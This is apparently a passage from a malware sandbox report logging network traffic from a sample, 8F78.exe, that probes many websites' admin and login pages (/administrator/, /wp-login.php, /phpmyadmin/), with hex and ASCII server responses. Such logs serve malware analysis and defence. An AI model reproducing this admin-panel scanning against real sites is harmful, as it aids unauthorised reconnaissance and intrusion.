                                                                                                                                                                                                                                                                                                                                Referer: http://escolapatelli.com.br/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.378981113 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                123192.168.2.45550550.116.86.49805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.261563063 CET246OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: escolapatelli.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://escolapatelli.com.br/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.402390003 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                124192.168.2.455460164.46.93.189805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.344497919 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: st-comet.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.639322996 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Mar 2020 06:02:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "415-5a17f6251cd80"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 1045
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab ef bc 88 55 52 4c ef bc 89 e3 81 8c e3 81 bf e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61 67 65 73 2f 63 73 73 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 74 6e 65 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 64 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 52 52 4f 52 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 68 65 61 64 69 6e 67 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 be e3 81 9f e3 81 af e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e3 81 af e5 ad 98 e5 9c a8 e3 81 97 e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 74 78 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb 55 52 4c e3 80 81 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e5 90 8d e3 81 ab e3 82 bf e3 82 a4 e3 83 97 e3 83 9f e3 82 b9 e3 81 8c e3 81 aa e3 81 84 e3 81 8b e3 81 94 e7 a2 ba e8 aa 8d e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 af e5 89 8a e9 99 a4 e3 81 95 e3 82 8c e3 81 9f e3 81 8b e3 80 81 e7 a7 bb e5 8b 95 e3 81 97 e3 81 9f e5 8f af e8 83 bd e6 80 a7 e3 81 8c e3 81 82 e3 82 8a e3 81 be e3 81 99 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 7a 65 6e 6c 6f 67 69 63 2e 6a 70 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61 67 65 73 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 38 35 22 20 61 6c 74 3d 22 7a 65 6e 6c 6f 67 69 63 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 2d 77 69 6e 64 6f 77 2d 77 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> 404 Not Found URL</title> <link rel="stylesheet" href="/zenlogic_pages/css/default.css"></head><body> <div id="header"> </div> <div id="cotnents"> <div class="code-block"> <h1>404</h1> <p>ERROR</p> </div> <p class="message-heading"></p> <ul class="message-txt"> <li>URL</li> <li></li> </ul> </div> <p class="center"><a href="http://zenlogic.jp/"><img src="/zenlogic_pages/images/logo.png" width="85" alt="zenlogic"><i class="ico-window-w"></i></a></p></body>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.639365911 CET9INData Raw: 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: </html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.652681112 CET230OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: st-comet.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://st-comet.com/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.947309971 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Mar 2020 06:02:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "415-5a17f6251cd80"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 1045
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab ef bc 88 55 52 4c ef bc 89 e3 81 8c e3 81 bf e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61 67 65 73 2f 63 73 73 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 74 6e 65 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 64 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 52 52 4f 52 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 68 65 61 64 69 6e 67 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 be e3 81 9f e3 81 af e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e3 81 af e5 ad 98 e5 9c a8 e3 81 97 e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 74 78 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb 55 52 4c e3 80 81 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e5 90 8d e3 81 ab e3 82 bf e3 82 a4 e3 83 97 e3 83 9f e3 82 b9 e3 81 8c e3 81 aa e3 81 84 e3 81 8b e3 81 94 e7 a2 ba e8 aa 8d e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 af e5 89 8a e9 99 a4 e3 81 95 e3 82 8c e3 81 9f e3 81 8b e3 80 81 e7 a7 bb e5 8b 95 e3 81 97 e3 81 9f e5 8f af e8 83 bd e6 80 a7 e3 81 8c e3 81 82 e3 82 8a e3 81 be e3 81 99 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 7a 65 6e 6c 6f 67 69 63 2e 6a 70 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61 67 65 73 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 38 35 22 20 61 6c 74 3d 22 7a 65 6e 6c 6f 67 69 63 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 2d 77 69 6e 64 6f 77 2d 77 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> 404 Not Found URL</title> <link rel="stylesheet" href="/zenlogic_pages/css/default.css"></head><body> <div id="header"> </div> <div id="cotnents"> <div class="code-block"> <h1>404</h1> <p>ERROR</p> </div> <p class="message-heading"></p> <ul class="message-txt"> <li>URL</li> <li></li> </ul> </div> <p class="center"><a href="http://zenlogic.jp/"><img src="/zenlogic_pages/images/logo.png" width="85" alt="zenlogic"><i class="ico-window-w"></i></a></p></body>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.947321892 CET9INData Raw: 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: </html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                125192.168.2.45559215.197.142.173805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.448334932 CET177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: enso-center.org
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.602025032 CET364INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: ip-10-123-122-40.ec2.internal
                                                                                                                                                                                                                                                                                                                                X-Request-Id: 5b06aafa-ea34-4f36-9925-26870350376a
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.636168957 CET220OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: enso-center.org
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://enso-center.org/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.788815975 CET365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: ip-10-123-123-181.ec2.internal
                                                                                                                                                                                                                                                                                                                                X-Request-Id: 32c40a2d-6bbf-4af4-a5ac-9d14e72b07d8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                126192.168.2.45559515.197.142.173805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.452512026 CET177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: enso-center.org
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.605665922 CET365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: ip-10-123-123-117.ec2.internal
                                                                                                                                                                                                                                                                                                                                X-Request-Id: 31aec87a-881b-4e3f-a8b8-d573251b9c28
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.636373997 CET220OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: enso-center.org
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://enso-center.org/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.789933920 CET365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: ip-10-123-123-165.ec2.internal
                                                                                                                                                                                                                                                                                                                                X-Request-Id: 39afc8bb-732b-4e40-b727-c7a2bbfdfcc3
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                127192.168.2.455684172.67.152.228805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.583323956 CET171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: keramat.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.729846001 CET692INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Location: https://keramat.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EyvpunYyCxuFarxptFl5hkg%2Bsk4sIUjq6mKDToLIDgfAutfitx86AfzkdRUuF7UafvACwKWO9glOhXlvO7bJGInCljR%2BYYd1Q%2FpuSkTUmvygp74nF%2FFKOoIPVXuy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3c54781225a0-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                128192.168.2.45568768.233.46.109805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.665872097 CET177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: brightright.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.832056999 CET460INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
